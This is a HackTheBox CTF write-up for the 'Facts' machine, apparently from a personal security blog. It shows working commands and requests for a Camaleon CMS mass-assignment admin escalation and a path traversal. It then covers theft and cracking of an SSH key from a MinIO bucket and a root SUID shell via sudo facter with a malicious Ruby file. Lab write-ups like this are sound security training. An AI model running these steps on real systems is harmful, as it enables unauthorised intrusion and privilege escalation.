CVE-2024-46987 on sckull https://sckull.github.io/en/tags/cve-2024-46987/ Recent content in CVE-2024-46987 on sckull Hugo -- gohugo.io en ©{year}, All Rights Reserved Sat, 06 Jun 2026 00:00:00 +0000 daily daily HackTheBox - Facts https://sckull.github.io/en/facts/ Sat, 06 Jun 2026 00:00:00 +0000 Sat, 06 Jun 2026 00:00:00 +0000 https://sckull.github.io/en/facts/ Facts — HackTheBox Writeup Field Details Machine Facts OS Linux Difficulty Easy Points 20 Release Date 2026-01-31 IP 10. <div class="featured-image__wrapper"> <img src="https://sckull.github.io/images/posts/htb/facts/cover.png" alt="featured image" class="featured-image" style="width: ;height: ;"> </div> <h1 id="facts--hackthebox-writeup">Facts — HackTheBox Writeup</h1> <table> <thead> <tr> <th>Field</th> <th>Details</th> </tr> </thead> <tbody> <tr> <td><strong>Machine</strong></td> <td><a href="https://app.hackthebox.com/machines/829">Facts</a></td> </tr> <tr> <td><strong>OS</strong></td> <td>Linux</td> </tr> <tr> <td><strong>Difficulty</strong></td> <td>Easy</td> </tr> <tr> <td><strong>Points</strong></td> <td>20</td> </tr> <tr> <td><strong>Release Date</strong></td> <td>2026-01-31</td> </tr> <tr> <td><strong>IP</strong></td> <td>10.129.17.99</td> </tr> </tbody> </table> <hr /> <h2 id="overview">Overview</h2> <p>In Facts we exploit two vulnerabilities in Camaleon CMS that allow privilege escalation and local file reading. From there we gain access to a MinIO object storage bucket containing a user&rsquo;s SSH private key, crack its passphrase, and land a shell. Finally we escalate to root by loading a malicious Ruby script through a privileged <code>facter</code> sudo rule.</p> <hr /> <h2 id="reconnaissance">Reconnaissance</h2> <h3 id="nmap">Nmap</h3> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nmap --privileged -p22,80,54321 -sV -sC -oN nmap_scan 10.129.17.99 </span></span></code></pre></td></tr></table> </div> </div><p>Three ports are open:</p> <table> <thead> <tr> <th>Port</th> <th>Service</th> <th>Version</th> </tr> </thead> <tbody> <tr> <td>22/TCP</td> <td>SSH</td> <td>OpenSSH 9.9p1 (Ubuntu)</td> </tr> <tr> <td>80/TCP</td> <td>HTTP</td> <td>nginx 1.26.3</td> </tr> <tr> <td>54321/TCP</td> <td>HTTP</td> <td>MinIO (Golang net/http)</td> </tr> </tbody> </table> <p>The HTTP server redirects to <code>http://facts.htb/</code> — add it to <code>/etc/hosts</code>.</p> <hr /> <h2 id="web-enumeration">Web Enumeration</h2> <h3 id="directory-brute-forcing">Directory Brute Forcing</h3> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">feroxbuster -u http://facts.htb/ -w /usr/share/wordlists/dirb/common.txt -C <span class="m">404</span> </span></span></code></pre></td></tr></table> </div> </div><p>Notable results:</p> <pre tabindex="0"><code>302 GET http://facts.htb/admin =&gt; http://facts.htb/admin/login 200 GET http://facts.htb/page 200 GET http://facts.htb/post 200 GET http://facts.htb/robots.txt </code></pre><h3 id="camaleon-cms">Camaleon CMS</h3> <p>The admin login redirects at <code>/admin/login</code>. Response headers confirm the CMS:</p> <pre tabindex="0"><code>link: &lt;/assets/camaleon_cms/admin/admin-basic-manifest-...&gt; </code></pre><p>After registering a user account the version is visible in the profile panel: <strong>Camaleon CMS 2.9.0</strong>.</p> <hr /> <h1 id="camaleon-cms-1">Camaleon CMS</h1> <h2 id="privilege-escalation-via-mass-assignment">Privilege Escalation via Mass Assignment</h2> <p>Camaleon CMS 2.9.0 is affected by <a href="https://github.com/advisories/GHSA-rp28-mvq3-wf8j">GHSA-rp28-mvq3-wf8j</a>. The password-change endpoint uses Rails&rsquo; <code>permit!</code>, which accepts the entire parameter array without filtering:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-ruby" data-lang="ruby"><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">updated_ajax</span> </span></span><span class="line"><span class="cl"> <span class="vi">@user</span> <span class="o">=</span> <span class="n">current_site</span><span class="o">.</span><span class="n">users</span><span class="o">.</span><span class="n">find</span><span class="p">(</span><span class="n">params</span><span class="o">[</span><span class="ss">:user_id</span><span class="o">]</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="vi">@user</span><span class="o">.</span><span class="n">update</span><span class="p">(</span><span class="n">params</span><span class="o">.</span><span class="n">require</span><span class="p">(</span><span class="ss">:password</span><span class="p">)</span><span class="o">.</span><span class="n">permit!</span><span class="p">)</span> <span class="c1"># VULNERABLE</span> </span></span><span class="line"><span class="cl"> <span class="n">render</span> <span class="ss">inline</span><span class="p">:</span> <span class="vi">@user</span><span class="o">.</span><span class="n">errors</span><span class="o">.</span><span class="n">full_messages</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="s1">&#39;, &#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">end</span> </span></span></code></pre></td></tr></table> </div> </div><p>The default role for new users is <code>client</code>. The administrator role is <code>admin</code>. By intercepting the password-change request and injecting the <code>role</code> parameter we can promote our own account:</p> <pre tabindex="0"><code>POST /admin/users/5/updated_ajax HTTP/1.1 Host: facts.htb _method=patch&amp;authenticity_token=&lt;CSRF&gt; &amp;password[password]=sckull123 &amp;password[password_confirmation]=sckull123 &amp;password[role]=admin </code></pre><p>After the request our account has full administrator access to the CMS.</p> <hr /> <h2 id="path-traversal">Path Traversal</h2> <p>With admin access we can exploit <a href="https://github.com/owen2345/camaleon-cms/security/advisories/GHSA-cp65-5m9r-vc2c">GHSA-cp65-5m9r-vc2c</a>, which allows reading arbitrary local files through an unsanitised path parameter in the file manager.</p> <p>Reading <code>/etc/passwd</code> reveals two local users:</p> <pre tabindex="0"><code>trivia:x:1000:1000:,,,:/home/trivia:/bin/bash william:x:1001:1001:,,,:/home/william:/bin/bash </code></pre><hr /> <h1 id="minio--credential-discovery">MinIO — Credential Discovery</h1> <p>Port 54321 runs a MinIO object storage server. Access credentials are visible in the CMS admin storage settings panel.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">./mc <span class="nb">alias</span> <span class="nb">set</span> randomfacts http://facts.htb:54321 <span class="se">\ </span></span></span><span class="line"><span class="cl"><span class="se"></span> AKIA956E61DAC1233FA8 cVaZKEQrFDgW6NmwZIiYYEl4vwzhuynSg9siYEEr </span></span></code></pre></td></tr></table> </div> </div><p>Listing the bucket contents reveals what appears to be the <code>trivia</code> user&rsquo;s home directory synced into the <code>internal</code> bucket:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ./mc tree randomfacts </span></span><span class="line"><span class="cl">randomfacts </span></span><span class="line"><span class="cl">├─ internal </span></span><span class="line"><span class="cl">│ ├─ .bundle/ </span></span><span class="line"><span class="cl">│ ├─ .cache/ </span></span><span class="line"><span class="cl">│ └─ .ssh/ </span></span><span class="line"><span class="cl">└─ randomfacts/ </span></span><span class="line"><span class="cl"> └─ thumb/ </span></span></code></pre></td></tr></table> </div> </div><p>The <code>.ssh</code> directory contains both the private key and <code>authorized_keys</code>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ./mc ls randomfacts/internal/.ssh </span></span><span class="line"><span class="cl"><span class="o">[</span>2026-01-31<span class="o">]</span> 82B authorized_keys </span></span><span class="line"><span class="cl"><span class="o">[</span>2026-01-31<span class="o">]</span> 464B id_ed25519 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ ./mc cat randomfacts/internal/.ssh/id_ed25519 </span></span><span class="line"><span class="cl">-----BEGIN OPENSSH PRIVATE KEY----- </span></span><span class="line"><span class="cl">b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCbydJFSr </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">-----END OPENSSH PRIVATE KEY----- </span></span></code></pre></td></tr></table> </div> </div><hr /> <h2 id="ssh-private-key-passphrase">SSH Private Key Passphrase</h2> <p>The key is passphrase-protected. Extract the hash with <code>ssh2john</code> and crack it with <code>john</code>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ ssh2john id_ed25519 &gt; <span class="nb">hash</span> </span></span><span class="line"><span class="cl">$ john <span class="nb">hash</span> --wordlist<span class="o">=</span>rockyou.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">dragonballz <span class="o">(</span>id_ed25519<span class="o">)</span> </span></span><span class="line"><span class="cl">1g 0:00:01:40 DONE </span></span></code></pre></td></tr></table> </div> </div><hr /> <h1 id="shell-as-trivia">Shell as trivia</h1> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ chmod <span class="m">600</span> id_ed25519 </span></span><span class="line"><span class="cl">$ ssh trivia@facts.htb -i id_ed25519 </span></span><span class="line"><span class="cl"><span class="c1"># passphrase: dragonballz</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">trivia@facts:~$ whoami<span class="p">;</span>id </span></span><span class="line"><span class="cl">trivia </span></span><span class="line"><span class="cl"><span class="nv">uid</span><span class="o">=</span>1000<span class="o">(</span>trivia<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1000<span class="o">(</span>trivia<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>1000<span class="o">(</span>trivia<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><p><strong>User flag:</strong> <code>407fc88c5e29ad88876774bb2e2d48ca</code></p> <hr /> <h1 id="privilege-escalation">Privilege Escalation</h1> <p>Checking sudo permissions:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">trivia@facts:~$ sudo -l </span></span><span class="line"><span class="cl"><span class="o">(</span>ALL<span class="o">)</span> NOPASSWD: /usr/bin/facter </span></span></code></pre></td></tr></table> </div> </div><p><code>/usr/bin/facter</code> is a Ruby script. It accepts a <code>--custom-dir</code> flag that loads and executes every Ruby file in the specified directory:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">trivia@facts:~$ file /usr/bin/facter </span></span><span class="line"><span class="cl">/usr/bin/facter: Ruby script, ASCII text executable </span></span></code></pre></td></tr></table> </div> </div><p>We create a Ruby file in a directory we control that copies bash and sets the SUID bit:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">trivia@facts:~$ cat file.rb </span></span><span class="line"><span class="cl">system<span class="o">(</span><span class="s2">&#34;cp /usr/bin/bash /usr/bin/sc&#34;</span><span class="o">)</span> </span></span><span class="line"><span class="cl">system<span class="o">(</span><span class="s2">&#34;chmod u+s /usr/bin/sc&#34;</span><span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">trivia@facts:~$ sudo facter --custom-dir<span class="o">=</span><span class="k">$(</span><span class="nb">pwd</span><span class="k">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">trivia@facts:~$ ls -lah /usr/bin/sc </span></span><span class="line"><span class="cl">-rwsr-xr-x <span class="m">1</span> root root 1.7M /usr/bin/sc </span></span></code></pre></td></tr></table> </div> </div><p>Execute the SUID copy to get a root shell:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">trivia@facts:~$ /usr/bin/sc -p </span></span><span class="line"><span class="cl">sc-5.2# whoami </span></span><span class="line"><span class="cl">root </span></span></code></pre></td></tr></table> </div> </div><p><strong>Root flag:</strong> <code>7ab46d7606afb1571fe684300a50c3c0</code></p> <hr /> <h2 id="attack-chain">Attack Chain</h2> <pre tabindex="0"><code>[Unauthenticated] │ ▼ Register user on Camaleon CMS 2.9.0 │ ▼ Mass Assignment (GHSA-rp28-mvq3-wf8j) → Inject role=admin into password-change request → Account promoted to CMS administrator │ ▼ Path Traversal (GHSA-cp65-5m9r-vc2c) → Read /etc/passwd → Enumerate local users: trivia, william │ ▼ MinIO Bucket Enumeration (port 54321) → Credentials leaked via CMS admin settings → trivia&#39;s .ssh directory exposed in bucket → Retrieve id_ed25519 private key │ ▼ Crack SSH Key Passphrase → ssh2john + john + rockyou.txt → Passphrase: dragonballz → SSH access as trivia │ ▼ Sudo facter --custom-dir → Load arbitrary Ruby from user-controlled directory → Copy bash + set SUID bit → /usr/bin/sc -p │ ▼ [root] </code></pre> sckull featured image meta image camaleon-cms-2.9.0 CVE-2025-2304 Ruby Mass-Assignment path-traversal CVE-2024-46987 MinIO ssh2john facter-privesc hackthebox linux